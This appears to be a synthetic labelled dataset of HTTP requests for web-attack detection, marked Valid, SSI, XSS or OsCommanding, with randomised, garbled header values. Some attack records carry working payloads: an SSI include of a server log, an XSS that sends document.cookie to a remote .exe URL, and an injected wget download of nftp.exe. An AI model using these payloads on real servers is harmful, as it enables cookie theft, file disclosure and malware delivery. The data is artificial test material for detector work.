If-Modified-Since: Sat, 19 Aug 06 04:28:58 GMT
If-Unmodified-Since: Sun, 29 Aug 04 12:57:37 GMT
If-Match: *
If-None-Match: "1AZrELr01qTZPEtgI"
If-Range: Sun, 17 Feb 08 10:26:39 GMT
Max-Forwards: 45
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic ZXN5VGE6b2lhcnFzZQ==
Authorization: NTLM eGhkcm14bjByZDVlSW5pclRBZjgweG5yYUVJNTN0dmNpYUFPdGh4c3Zs
Range: 8-2936,2807-187745
Referer: /bTrflse/sngHperg/uhnwd3.txt
TE: gzip;q=0.1,deflate;q=0.4,trailers
Trailer: Date
User-Agent: Mozilla/2.5 (X11; U; Linux i586 8.5; er-el; rv:2.5.2) Gecko/80803230
UA-CPU: PowerPC
UA-Disp: 5168,522,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 040x521
Via: 0.8 57.216.146.65, 4.6 www.ue0no7rh.css:4676, isHte/6.8 172.143.221.235:49132
Transfer-Encoding: deflate
Upgrade: ews/8.3
Warning: 447 www.bZeni6p.shtml "AoEoefv3atbtNidjY9e" 
X-Forwarded-For: 145.243.54.100
X-Serial-Number: 2418413
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21327
Start - Id: 9286
class: Valid
GET /6qz/ar-ghWfVbm/S.o0/jarmo.htm?aPbhxai=ezbaoalibg&Aaosbc1=cTpsfrghDo&abzT-V=bdIe1Vulcy&Q.57OxDytlD=group+byay&rlracdc=7gXAW4OE5I99&hgslo=9 HTTP/1.0
Host: 195.213.197.208
Connection: oopaqiI
Accept: image/*
Accept-Charset: euc-cn;q=0.7, windows-1253
Accept-Encoding: 
Accept-Language: 9-asuvHi;q=0.6, hZguaI-l, 8snn1-we0va2, e-wa, sct6M-tp;q=0.3
Cache-Control: only-if-cached
Client-ip: 85.8.201.156
Cookie: 37ePt9=bto5lokg2wg2iial;ayGorkKbinl=6201
Cookie2: $Version="5"
Date: Sat, 19 Feb 05 21:49:00 GMT
ETag: "f5nv.ZIs16f3Ycv"
Expect: 100-continue
From: iiae5@rlfv.it
If-Modified-Since: Fri, 23 Jun 06 17:50:36 GMT
If-Unmodified-Since: Sat, 15 Aug 09 21:11:07 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 05 Dec 08 13:46:10 UTC
Max-Forwards: 5794
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic c2FvdDp0bU55bGt0
Authorization: ehago nt0i=iT6n
Range: -7,24425-
Referer: /3dsw8h3s/yyuzc/nret/tfo2.dll
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: aysgdoh/9.8.7
UA-CPU: 68000
UA-Disp: 8991,9387,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1723x158
Via: FTP/4.9 www.ebOlt.js
Transfer-Encoding: identity
Upgrade: ne3a/3.0, ktz/8.6, tsjraE/5.2, hlfe/6.2
Warning: 773 228.146.161.18 "eogoeOendth" "Tue, 23 Jan 07 17:19:26 CET"
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9286
Start - Id: 39510
class: SSI
GET /L1SBCFaoFI/tJcsHAShttps/wowf3Fs/SMDg0/eyvb.7W0rtF6XKCC@3/dl/sd4edds/vKyyp.js?cdTuhnHWwi=y49PUQ&rZBWaNp.U=6r&0wojZH=eBr9fp0o&lgbjh=nata&ai=4405&easouigIARaaecN=76376895&9hhpwtwlht1mti=8&EkAr=gb-s3&nn9rnFntt=23481&HzTtwYsM=frwHnouoxnP&4XW_=33400&EmjdXfX3=qk&tEa=n%28 HTTP/1.1
Host: 29.196.98.93:76939
Connection: close
Accept: */*
Accept-Charset: cp-936, windows-1250, windows-1254
Accept-Encoding: identity;q=0.5, gzip;q=0.6, gzip
Accept-Language: <!--   #include virtual="/var/log/httpd/access.log"  -->
Cache-Control: max-stale
Client-ip: 142.135.177.191
Cookie: PtatdlEt=ogLc;c7a0uhtl8zsmh=allhaa
Date: Mon, 12 Jan 09 06:49:53 CET
If-Match: "4ixpnuw@1cQLLWE"
If-None-Match: *
Proxy-Authorization: Bhipen rsey=lf6gRsEl
Referer: http://www.7eny3tbo.biz/scma/n8auuyh/dyljnsa.swf
TE: trailers,trailers
User-Agent: Mozilla/7.6 (compatible; xetSouebe; Unix; sea7g)

null

End - Id: 39510
Start - Id: 47006
class: XSS
GET /wkU2wgsU3SJs/t1zFwuuyweS__chlo/h.K76O/imelnt/Hi/nZc@vNomXcaJdn/r88RLJ0/jO5JmFcaEf/toeB3rSYo6RuBTZfn.js?K7likej=hcrgte&tutnc=gyd8ocEot&ilesey=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Bwindow.open%28%27http%3A%2F%2F3.108.234.29%2Fnd.exe%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E&zj0Yh=bin+%5C&nYboot.iniYxIcKSE9=84038745&pKdhasbosiwyg=0463877&ztMwfeoueooo=um%25u HTTP/1.0
Host: www.id9o2.uk:9210
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, compress, deflate;q=0.1, gzip
Accept-Language: ie2lMtJ-rhtx8;q=0.1, us5eomi0-dhta6, Ib-7redltgm;q=0.3
Cache-Control: min-fresh=9
Client-ip: 165.46.126.133
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="07"
Date: Wed, 13 Feb 08 21:04:34 GMT
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Sat, 08 Aug 09 10:50:52 GMT
If-Unmodified-Since: Sun, 16 Apr 06 16:27:56 CET
If-Match: "Oh8lDE_Ne68h.UyS"
If-None-Match: *
If-Range: Sun, 18 Oct 09 22:55:45 GMT
Max-Forwards: 97
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Digest uri=http://www.hnk7xso4.fr/ttaimr/Neratne0.css
Range: 5-22964
Referer: http://www.ghkdwcxU.org/uatee.dll
TE: trailers
Trailer: Upgrade
User-Agent: mqFliCmZ2 http://www.einePa.fr
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 347x3393
Via: 5.3 128.194.204.112, FTP/2.4 254.40.235.15:29, 1.1 205.201.60.208
Transfer-Encoding: dfqc
Upgrade: l9oe/6.6, lEdpas/0.5, d78nsb/8.9
Warning: 566 128.189.134.143 "YDlny79wlhoin" "Sun, 22 Jun 08 15:26:41 CET"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 09560109
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47006
Start - Id: 21642
class: Valid
GET /5pooaene8icseg9el/s4oe3/ueapm0yiStitdhi.htm?fe=8g+i&tn=eeesty&fra=277617644&.QjXgUpcatHjAj=5eIoanr1ehnitsl&btide35opare=836 HTTP/1.1
Host: 20.1.254.149:80
Connection: close
Accept: audio/basic, image/*
Accept-Charset: windows-1258;q=0.1, x-mac-korean, gb2312
Accept-Encoding: 
Accept-Language: dn2t-rcszYaam
Cache-Control: only-if-cached
Client-ip: 211.84.162.129
Cookie: rsfaeaeola7ttrl=rd
Cookie2: $Version="715"
Date: Mon, 07 Aug 06 08:40:00 UTC
ETag: W/"0VhiS0Dr@.npOb.dea"
Expect: Xel8
From: ynfima@o2e6raaBs.org
If-Modified-Since: Mon, 02 Apr 07 13:46:12 GMT
If-Unmodified-Since: Sun, 03 May 09 11:11:17 CET
If-Match: "ZC6VHvcYhNJ-M@w1"
If-None-Match: *
If-Range: "D_AvSv4dU.Izs-vigWfg"
Max-Forwards: 6841
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ms4Mq"
Authorization: Basic emN1Y2c6TWRwbFQ0
Range: -70672,783-,227-
Referer: /setdoS1.doc
TE: trailers,trailers,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: e4lpnmunlr/7.5.9.4
UA-CPU: PowerPC
UA-Disp: 335,8067,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 838x039
Via: HTTP/7.4 229.200.244.94, 4.5 www.eaizddl.tiff
Transfer-Encoding: identity
Upgrade: rta/6.9, hinor/4.0
Warning: 753 www.r8e8sd.jpeg "PRrTs4cebef6fdeoabnr" "Sun, 27 Mar 05 04:06:35 CET"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 1329095
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21642
Start - Id: 47171
class: XSS
GET /lU978RN37IKShPYs/noamGcSV31aeezoFag/mTtAbcXOicaST2/cbhHZqNiP/rk/rMEzkhLGHlWL1_.j/tygEOq5vS0WtvSt8b7/slA6emqu/7SfW4o2HNEaxTbi5/o-hYje0DfMwytQGeyi2R.asmx?TselectjETLFwI5_=msSFjNL4h0KO&zig5h=4recmdne%3BnullIboot.iniewgeti&hm3scbAaIe=5npnenQ&bhea7bli=%3Cxml+++id+%3D%22++X+%22++++%3E%3Ca%3E%3Cb+%3E%26lt%3Bscript%3E%5Balert++%28%27lMPei%27%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb+++%3E%3C%2Fa++%3E%3C%2Fxml++++%3E&X7w2=sam0n0&nts=3%400qo&etyY2lUbsws6Fp=9464 HTTP/1.0
Host: www.Fuurra.net
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 180.109.10.125
Cookie: 7flKgUtin.c0=6528722;i7neN=38363314
Cookie2: $Version="45"
Date: Mon, 22 Mar 04 12:44:59 CET
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: 100-continue
From: 4roN@u1ea7.uk
If-Modified-Since: Thu, 22 Feb 07 12:07:11 CET
If-Unmodified-Since: Sun, 09 May 04 08:27:29 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 320
MIME-Version: 2.0
Pragma: moau99l=e
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: NTLM d2E3UEVXdHJFRXNtaWd0Y3V0bWxoZW55aXdpMTRpYWtjcHA3cW1vdUlwN05nUg==
Range: -016,1-,67332-47295
Referer: /cgwrd/eaeiaosI.php3
TE: deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.7 (Windows; U; WinNT 5.5; yr-li; rv:7.0.9) Gecko/38016594
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: lben/7.2 www.u9eaCh.tiff:22602
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47171
Start - Id: 28398
class: Valid
GET /cnsdI0dten.asp?ttRnasusniep=1944&gnua0n=11&eisnsrbzasnu=slibas&c0y1e=rpcinserts&uvdwstomzoCdixS=1686554&tdy=nnetcatqi4iframeq HTTP/1.1
Host: www.pebq.org:80
Connection: keep-alive
Accept: audio/x-wav, video/quicktime;q=0.7, video/*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.1, gzip, deflate
Accept-Language: reh2xa-7sph;q=0.3, 42trb-mc6Cul0g
Cache-Control: min-fresh=29701
Client-ip: 219.151.152.68
Cookie: raueRooe=(srt otS8enolog;d11QinPUzbQ=71;nyejLfr3ketper=4;onheefEtedrig=openo
Cookie2: $Version="142"
Date: Tue, 08 Jul 08 09:39:02 GMT
ETag: W/"bgp-f03GkjwIQx7"
Expect: wo7sdhm
From: oBcae9t@txO3eond.biz
If-Modified-Since: Mon, 12 Jan 09 24:10:08 UTC
If-Unmodified-Since: Sun, 12 Sep 04 17:55:30 UTC
If-Match: "tbWseGW3eOPUlE7d"
If-None-Match: *
If-Range: "2XcIOM6U-0A@NeMb"
Max-Forwards: 4935
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic b3NtdDA6YW5mMmFvYXQ=
Authorization: NTLM ZWVnZGhzZW5JZ2RuYW5hdG41eGVyZ29lNUNpbkhpc2xuZ3R6dGFhaWJ0Um10dm94
Range: 78-1826
Referer: /rcg0fun/tsri.mp3
TE: chunked;q=0.9,trailers
Trailer: Via
User-Agent: Mozilla/5.8 (Windows; U; Windows NT 1.7; ra-ys; rv:5.9.7) Gecko/74996605
UA-CPU: PowerPC
UA-Disp: 243,084,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1032x082
Via: FTP/0.4 www.ai3pi.gif:9514, FTP/2.7 159.224.23.94, HTTP/4.9 www.0ehdeenu.jpeg:9477
Transfer-Encoding: gzip
Upgrade: tC5/6.1
Warning: 283 www.hdean.gif "eabmweetutsixy" 
X-Forwarded-For: 112.8.23.251
X-Serial-Number: 15983235
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28398
Start - Id: 36700
class: OsCommanding
POST /Qlpassthrul3/hmmes6atuoamtA/nph-5qkqnode2s9PUs@q/LENTnB-eSv/eRSAyw3v/3N8/eLmhRbnqp_ibCupN8L/iBwF/uzSTiWb/RheaoeP0htrsct.css? HTTP/1.0
Content-Length: 103
Content-Language: wa,eRT
Content-Encoding: compress
Content-Location: http://www.wtapYeN.org/watCl57/uneft/isct/ipenhnNs/lGnodnT.jsp
Content-MD5: cmxybkNlbzVuaGRjb2VyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 06:36:30 UTC
Last-Modified: Sun, 09 Apr 06 21:50:24 CET
Host: www.sdreeOy.ch
Connection: close
Accept: application/zip;q=0.7
Accept-Charset: *
Accept-Encoding: identity, deflate
Accept-Language: ela-Ed9vsr
Cache-Control: only-if-cached
Client-ip: 24.6.250.56
Cookie: its=2eiyaasF7oe;ncuO4ahqzLUz_=13395375;yYyic7enw=cSBIGAS.9_;yrekIaxae=mV3m9-
Cookie2: $Version="134"
Date: Mon, 30 Mar 09 15:31:47 GMT
ETag: W/"0nfSgJ8-r8YGC80"
Expect: 7oiToetn
From: debomi@hLAy.be
If-Modified-Since: Sat, 21 Jun 08 05:05:00 GMT
If-Unmodified-Since: Sun, 30 May 04 02:57:21 UTC
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Sat, 29 Oct 05 15:26:46 UTC
Max-Forwards: 649
MIME-Version: 8.8
Pragma: hnon5s=d4o
Proxy-Authorization: Basic RWNlanNsNG46dGM3MHhv
Authorization: Digest username="lruyb"
Range: 426198-
Referer: /herr1dro/taek/thhg/sohllua/tols.mp3
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 4.7; Eb-ml; rv:5.3.1) Gecko/85774726
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: FTP/4.3 www.nfed.jpeg, 0.4 207.157.93.68, 6.6 221.107.236.159
Transfer-Encoding: deflate
Upgrade: rqbee/8.8
X-Forwarded-For: 123.125.191.125
X-Serial-Number: 56753790065108318
----: -------------------------

ntnlhud=a|mo&tutwtnnoras=\n wget   http://244.76.225.146:963/nftp.exe&koeenteIr=201242259

End - Id: 36700
Start - Id: 23404
class: Valid
GET /andifZX/3I8UiTchildadmin/oPhy0VZ2/ibsZaeg/cp6ns/7fiiiwteA7beiTb7sav/eyit2nDlnvnyRaia/8mLopenUuhlibKwindow.open0b/2tshptu/12pXESqvbin/odiuysRzNoT/oux3mfhaoel.jpeg?3uvoCr@2=9593196617&tunsQs=hisa&oxn2rnftil8yt=Ael02aEta6tUjIshoi&4yeM=6&tnTrevho=ado%3C HTTP/1.0
Host: www.niidss.net:96098
Connection: a9lcnii
Accept: video/*, audio/basic;q=0.0, video/*
Accept-Charset: x-mac-arabic;q=0.1, iso-8859-9;q=0.5
Accept-Encoding: compress;q=0.5, gzip, gzip, gzip;q=0.3
Accept-Language: ppl-Cfy;q=0.9, e-tseois, p-ldn2t, nc-ao
Cache-Control: no-transform
Client-ip: 200.220.239.93
Cookie: Sgom=6660
Cookie2: $Version="98"
Date: Thu, 01 Nov 07 23:54:34 CET
ETag: W/"MENga3oJqrkK1WZ"
Expect: 100-continue
From: a6sift@tQttntioi.fr
If-Modified-Since: Sun, 04 Jan 09 05:22:17 UTC
If-Unmodified-Since: Fri, 22 Apr 05 02:24:36 CET
If-Match: "-ubUxaxUcqPCNgJfK0F"
If-None-Match: "HwG8KuvjuT2KP0LlC"
If-Range: "n9BocchgLwdiUbPwO7.2"
Max-Forwards: 77
MIME-Version: 5.9
Pragma: h4hv6tI=oqhkmipv
Proxy-Authorization: Digest realm
Authorization: NTLM dDNicmhnaDRyd2VpeW5ONGxnYXF0ZGllbWhvOXNzYm5iZTFH
Range: 4420-,4-06,61-
Referer: /v2u7s/uenlrsI.pl
TE: deflate;q=0.3
Trailer: Referer
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 7.4; tj-xN; rv:0.4.4) Gecko/54565744
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x4645
Via: 0.1 www.hpweeiA.js, HTTP/6.5 204.19.137.208:075, 5.6 www.eneo.shtml
Transfer-Encoding: compress
Upgrade: afyagd/6.9, Lcmr8/4.4, yHo8/4.4, oeeIe8/7.6
Warning: 695 232.32.155.255 "z2eeaslsueN" "Mon, 13 Jul 09 13:36:55 UTC"
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 329196523
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23404
Start - Id: 9048
class: Valid
GET /sEtrU/66f_CRztl9Lii/sR75X/dSvtRNdBQgd/n9I2/dTUQl@4CqrF/tv7yhyVrXofKA.-U/o6x_having/ooglFi7azq/eVwCEaYeqA-6eOu@.2j/pi6QL8ezO.png?aoy4UleE=t46_&syamt=sonoe9gull68&eejdtsumol=t%24%5B&4Cf_yphpUG=objecta9wh&eRaeaqpmo=969&G_-Qg0=qom3raj&nlrweMNsynin0el=rfcCA&chboeaeiTs4lse=madQ&U0PJHm0UK09=gajQ&nsmK7i7iaztowr=oSd&8hi9=eonwa2lpi&kd3E=1457&ia6ooheeaoh=ns0&shdpmoacoielh=o6hp1_&tHt=063054030 HTTP/1.1
Host: 145.228.217.57
Connection: close
Accept: application/*;q=0.2, audio/*;q=0.4
Accept-Charset: windows-1257;q=0.3, x-mac-japanese
Accept-Encoding: 
Accept-Language: cpadere-cear
Cache-Control: max-age=64
Client-ip: 168.206.47.117
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="634"
Date: Tue, 25 Jul 06 02:49:27 CET
ETag: "DI4ds9YeaV3hd@S_XAy"
Expect: rua8eTaD=haolmyh;ktaNk
From: nYe8@Sqo1l5.uk
If-Modified-Since: Thu, 17 Jun 04 05:01:11 UTC
If-Unmodified-Since: Sat, 03 Dec 05 02:13:12 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jul 04 23:47:43 UTC
Max-Forwards: 08
MIME-Version: 8.0
Pragma: aH=beeeot
Proxy-Authorization: Digest uri=/Otel0DNt.asp
Authorization: Digest nonce
Range: -9,-8753
Referer: http://mled.com/ek9hataa/l9anil.pdf
TE: deflate
Trailer: TE
User-Agent: Ltdtec6ioitGqnM6n4be
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 117x032
Via: 1.2 149.243.70.125, 2.6 www.eerho.jpeg
Transfer-Encoding: sej6x; elhr=oPntiN
Upgrade: hrimd/4.4
Warning: 283 116.154.53.88 "5oiE4hneih" "Sat, 27 Jan 07 01:20:17 UTC"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 278976284
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9048
Start - Id: 12170
class: Valid
GET /y_FL8bHgK9/etmzUnZQiEk2/fIbMmqnasmdqq.S/gE6yc5/ol/dkjiEA41c/rraf97/ldydac/2es/4urrs4dfTaltjh3lsah/jlocationT2YgvPY.css?rertiiAnAUs=TotdeleteD&sBogAbneh5o=iqScmhd&t3u6aaoloAuh=Nainserte&clN5mnueu=borTjUg4as&aifirE=nHi&rdetame=9idd%3F%26 HTTP/1.1
Host: 136.56.40.0:8
Connection: dr65ozr
Accept: audio/*;q=0.3, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: mnms-Tcrih7Et
Cache-Control: ut=dshd
Client-ip: 103.226.92.182
Cookie: d68=aogsbWs93teo4i;ath3estEoNpset=631;6deoihe0thw=86482;tielTTrst3iahj=13721;oaredeetmoadds=eVhqd;tthrNdrctnrtnDa=aPmPoe nn5hr~i
Cookie2: $Version="2"
Date: Mon, 27 Nov 06 03:57:29 UTC
ETag: "vP5WyXiK_Ogb6z9m@"
Expect: lusru=ihdmtn
From: eeotsLel@forahartri.net
If-Modified-Since: Mon, 06 Dec 04 18:50:49 UTC
If-Unmodified-Since: Thu, 24 Jun 04 14:30:27 CET
If-Match: "t5dlC4wLmdfAdkwC"
If-None-Match: "dj8WNjKLWFoUm8iCXwpY"
If-Range: *
Max-Forwards: 94
MIME-Version: 1.4
Pragma: d='ophehe4'
Proxy-Authorization: lert mmeei=fdhn
Authorization: syualn atb5Dae=akwes
Range: 91-,-6,6-46
Referer: /0be9o/fh2uea.sh
TE: trailers
Trailer: Via
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 2.2; i8-zC; rv:3.4.1) Gecko/57628772
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
Via: 7.1 199.40.158.115, ansee/2.9 109.89.142.205
Transfer-Encoding: compress
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12170
Start - Id: 68
class: Valid
GET /tURGHIdivGP2Y.Z1MO/eani0neo3Yh1tr3t/ex4r4qtrm/euathtsunPfO/glB9V3c/qmt5/uMH187Ch.exe? HTTP/1.0
Host: 140.244.133.51
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: windows-1252;q=0.5, windows-1250, iso-8859-9
Accept-Encoding: 
Accept-Language: ne-h;q=0.4
Cache-Control: no-cache
Client-ip: 2.252.143.150
Cookie: yfem=hen;oojn=31413
Cookie2: $Version="646"
Date: Fri, 16 Sep 05 09:47:19 UTC
ETag: "ypQlb@I913j7tUs"
Expect: 100-continue
From: hhfiYtat@W0diMywt.it
If-Modified-Since: Mon, 29 Jan 07 22:32:43 GMT
If-Unmodified-Since: Fri, 29 May 09 11:33:29 UTC
If-Match: *
If-None-Match: "aYaoVac9tiu6nZ4"
If-Range: "ezD-.nB7Cl5HP6e1"
Max-Forwards: 4
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: pVlh asmms=iwoa
Authorization: 4h2sas iuou=nHae
Range: 1364-
Referer: /sohrn/qfwc/suuI0/Ogreo/ilu5qeie.jsp
TE: deflate;q=0.3,trailers,deflate;q=0.1
Trailer: Date
User-Agent: Psti3r (nwOkPXh; fz2nn9lN; eyCsNg; evyDDW6z)
UA-CPU: MIPS
UA-Disp: 4994,968,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 415x959
Via: eOee2/8.3 151.45.48.186, 6.7 www.srseeao.html, 5.2 www.oduenEr.html
Transfer-Encoding: identity
Upgrade: 8wp/1.6, oh2/7.9, litly/2.3
Warning: 754 165.186.54.133:11 "ceaa7ahtoenmn" 
X-Forwarded-For: 88.93.220.175
X-Serial-Number: 953974207660518
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 68
Start - Id: 21513
class: Valid
GET /sL2.indNnyFXD8a@EnC@/tKetfnov0n2Soe/eok/iPlikeQlQ2t.bin?sdIshituS=link+e+%25brmp%2FnlhAupdateformd&adminVOnull=2&nsdFu.2Mb5htacces=27002&sahe9lmthu=tbtk&U617e=rnh&xpmthCJ=un&nsmxjjt1tBs4tr=bo2aahon+%40cmdOobjectn&zt5ibpijmt=cfi-5j9dko8M&2mqa=eoxDfB0sN&tc0=hitoi0aYm&Ffesnesmmr=r3O&hBrtyep=k5Jy.roDt&okttreLte=e%28autoexec%3A2 HTTP/1.0
Host: www.miptnciea.ch
Connection: keep-alive
Accept: image/*
Accept-Charset: cp-936
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale=7
Client-ip: 129.114.252.94
Cookie: eoGoqpa3gel=93529;its=2hGig@t;boot.inilocationoIgW6=9stdin1jh7s;Sanedhuoirls=izL-JGdvG5jR;0buszjHeto=ur tq;totGzum7nwjhep=whOR13Zr5Ws
Cookie2: $Version="57"
Date: Sun, 20 Aug 06 23:29:44 GMT
ETag: W/"iv@b4s9k5Xo4jt0E3"
Expect: bnur
From: 8whhees@Oeeq.net
If-Modified-Since: Sun, 23 Jul 06 01:20:17 UTC
If-Unmodified-Since: Fri, 18 Apr 08 13:54:39 CET
If-Match: "yOLCyfoc1YMs7aEK"
If-None-Match: *
If-Range: Fri, 29 Oct 04 21:03:32 CET
Max-Forwards: 507
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 9134-
Referer: /nendyetm/Nsyshhsr/g9sounl/rsroaoo.conf
TE: trailers,trailers,deflate
Trailer: Referer
User-Agent: Mozilla/1.6 (X11; U; Unix 4.8; ge-i6; rv:3.0.1) Gecko/43290842
UA-CPU: 68000
UA-Disp: 028,1328,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5415x3665
Via: 3.3 88.122.80.40:2
Transfer-Encoding: compress
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21513
Start - Id: 31017
class: Valid
GET /wSjO/iAgjr/ThtMaes/nSYGJzr2k-..swf?nh18=517003&hm=passwdtit&ndtdo7noe6=atscriptd1delete&pampbtsti=Eeselect7drop&Oi2@sB=e%24%7Etal%28qyhai HTTP/1.1
Host: 49.159.199.38
Connection: tn7Ei1
Accept: application/zip, application/zip;q=0.4
Accept-Charset: x-mac-japanese;q=0.2, x-mac-icelandic;q=0.0
Accept-Encoding: compress;q=0.1, compress, deflate;q=0.6, identity, identity
Accept-Language: vgo-wolxanoe, dasi-olm1rrmo, tcoi-trt, 8a-e6t0r7;q=0.2, oqg73co-le6la;q=0.9
Cache-Control: min-fresh=43763
Client-ip: 154.71.85.33
Cookie: NEsq=4471;3IE9PBwd=4
Cookie2: $Version="98"
Date: Sun, 07 Feb 10 09:39:08 UTC
ETag: W/"RQ5xhFlWo_4aXrfmvpO"
Expect: 100-continue
From: 7SpILwe@tml2gof.de
If-Modified-Since: Fri, 19 Dec 08 11:49:32 UTC
If-Unmodified-Since: Wed, 30 Sep 09 22:52:55 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Feb 08 12:51:25 GMT
Max-Forwards: 97
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="VltR"
Authorization: NTLM bnBzb2Vlb28yamRhU0FpbHVzdGVvYzllVUVpYjl0aHM0bGVvZXRuZThzaWx1ZQ==
Range: 74-93290,6-30238
Referer: http://www.iaf7.biz/egitf/lpFU/litutlqo.aspx
TE: gzip,chunked,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 2.0; pm-iy; rv:4.7.9) Gecko/52879752
UA-CPU: MIPS
UA-Disp: 9729,1420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 777x272
Via: FTP/8.0 65.152.239.50
Transfer-Encoding: compress
Upgrade: lkT/4.2, nRs4h/2.7
Warning: 748 223.214.209.242 "ttmlx0H5" "Fri, 19 Feb 10 21:58:45 CET"
X-Forwarded-For: 175.214.29.11
X-Serial-Number: 76093774
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31017
Start - Id: 25955
class: Valid
GET /jt/MoJ2Q/pkdPieacpoefzslwtlor/s4TqOquYGgFHhVZXp/temrexottnd.jsp? HTTP/1.1
Host: 226.204.4.145:80
Connection: rnxolse
Accept: audio/*, audio/*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, identity, gzip, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 186.203.180.131
